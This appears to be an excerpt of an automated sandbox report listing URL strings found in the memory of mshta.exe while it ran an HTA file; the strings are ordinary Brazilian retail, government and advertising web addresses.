Source: mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.000000000443E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539662366.0000000004460000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540937966.0000000004481000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548436103.0000000004482000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/04/7-banners_home_mob-campanhas-home-300x450-ca
Source: mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.000000000443E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539662366.000000000448C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.000000000448C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539662366.0000000004460000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540937966.0000000004481000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548436103.0000000004482000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/04/8-banners_home_mob-campanhas-home-300x450-31
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540298823.0000000005278000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005278000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535678247.0000000005332000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539944087.00000000051A9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005185000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/04/8-home-destaque_desk-2c70954c6dab.png
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/04/8-home-destaque_mob-226821f368af.png
Source: mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/04/desk-702x108px-megaoferta-Natal-wht-739e8bae
Source: mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/04/mob-648x162px-megaoferta-Natal-wht-81c53fb54
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540298823.0000000005278000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005278000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.000000000443E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540262182.000000000444A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/06/1-home-destaque_desk-6116be1e9cac.png
Source: mshta.exe, 00000000.00000003.538629144.000000000070C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538952952.00000000006D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539930695.000000000070D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/06/1-home-destaque_mob-0600bcc12452.png
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.00000000051B8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539944087.00000000051B8000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/06/exclusivo_app-desk-5c02896f8c53.png
Source: mshta.exe, 00000000.00000003.538629144.000000000070C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538952952.00000000006D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539930695.000000000070D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/06/exclusivo_app-mob-19fde28501d5.png
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538457983.000000000517C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.00000000051D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539944087.00000000051D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005185000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539528256.0000000005D8E000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/09/sec-brinquedos_esporte-e-lazer-destaque-desk
Source: mshta.exe, 00000000.00000003.538629144.000000000070C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484305682.0000000005378000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535449726.0000000005307000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538952952.00000000006D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535589591.0000000005309000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535199624.0000000005307000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535775149.000000000530C000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/12/09/sec-brinquedos_esporte-e-lazer-destaque-mob-
Source: mshta.exe, 00000000.00000003.538629144.000000000070C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537741934.0000000007B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535727062.000000000530E000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.0000000007B6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.000000000443E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484369993.0000000000C82000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005E24000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535449726.0000000005307000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535589591.0000000005309000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.541246958.0000000005E25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535199624.0000000005307000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539930695.000000000070D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539662366.0000000004460000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540922781.00000000006CA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540374546.0000000005E24000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/zion/manifest/icons/1f3cb37c9be5fb0e9dd16b6ac97e213c.opengraph-imag
Source: mshta.exe, 00000000.00000003.540438972.0000000007AD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537741934.0000000007B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.0000000007B6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537867574.0000000007AAC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.000000000443E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540834795.0000000007AD1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484369993.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007A50000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538411913.0000000007AB7000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://informacoes.anatel.gov.br/paineis/certificacao-de-produtos/consulta-de-produtos
Source: mshta.exe, 00000000.00000003.540298823.0000000005278000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.0000000005278000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.542885580.0000000005279000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548706573.0000000005281000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548594202.000000000527B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://informacoes.anatel.gov.br/paineis/certificacao_5
Source: mshta.exe, 00000000.00000003.548350262.00000000051D4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539173540.00000000051D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539944087.00000000051D4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://logs-referer.s3-sa-east-1.amazonaws.com/image.jpeg?x-cm=lasa&x-ref=acessorios-8f96648a2579.p
Source: mshta.exe, 00000000.00000003.556994842.00000000055D0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.353830194.0000000000C46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mkt.americanas.com/pub/cct?_ri_
Source: mshta.exe, 00000000.00000003.535486328.0000000005344000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535351898.0000000005337000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535471671.000000000533C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://newtail-media.newtail.com.br/v1/rma/1da8ef01-58c8-48bc-9086-038fcb3aeeb3https://www.american
Source: mshta.exe, 00000000.00000003.537786668.0000000004494000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537741934.0000000007B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.0000000007B6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548436103.0000000004494000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537630543.0000000005E24000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540937966.0000000004494000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484369993.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539662366.0000000004494000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://nossaslojas.americanas.com.br/?chave=dk_ft_lojas
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539149198.000000000514B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539161574.0000000005152000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539754578.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538862819.000000000515E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539805523.000000000515F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484354237.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484324614.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://nossaslojas.americanas.com.br/?chave=prf_hm_0_tt_9_lojas
Source: mshta.exe, 00000000.00000003.536218874.0000000001031000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.524069852.0000000001025000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pagead2.googlesyndication.comHJ
Source: mshta.exe, 00000000.00000003.538457983.00000000052A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.542885580.00000000052A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537741934.0000000007B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.0000000007B6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548280086.00000000052A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484369993.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540049421.00000000052A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.541042280.0000000005CF7000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://protecaodemarcas.americanas.io/
Source: mshta.exe, 00000000.00000003.540438972.0000000007AD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537867574.0000000007AAC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540834795.0000000007AD1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007A50000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538411913.0000000007AB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://protecaodemarcas.americanas.io/0
Source: mshta.exe, 00000000.00000003.540438972.0000000007AD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537867574.0000000007AAC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540834795.0000000007AD1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007A50000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.00000000079F2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538411913.0000000007AB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://protecaodemarcas.americanas.io/d
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537741934.0000000007B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539645441.0000000007984000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.0000000007B6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.542912735.00000000079D5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538072268.0000000007982000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.548679681.0000000005D1D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540114671.00000000079CB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484369993.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539776600.00000000079B3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.541042280.0000000005D1D000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://ri.americanas.com/governanca-corporativa/estatuto-codigos-e-politicas
Source: mshta.exe, 00000000.00000003.537786668.0000000004494000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ri.americanas.com/governanca~
Source: mshta.exe, 00000000.00000003.515835386.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537741934.0000000007B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484385350.00000000065C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537412593.0000000007B6A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537518423.0000000007AE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.540164157.000000000515D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539475394.0000000007AE7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484406392.0000000007A52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.484369993.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539726653.00000000043D6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.537786668.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.535351898.0000000005337000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.538835391.0000000005158000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.539805523.0000000005159000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://ri.americanas.io
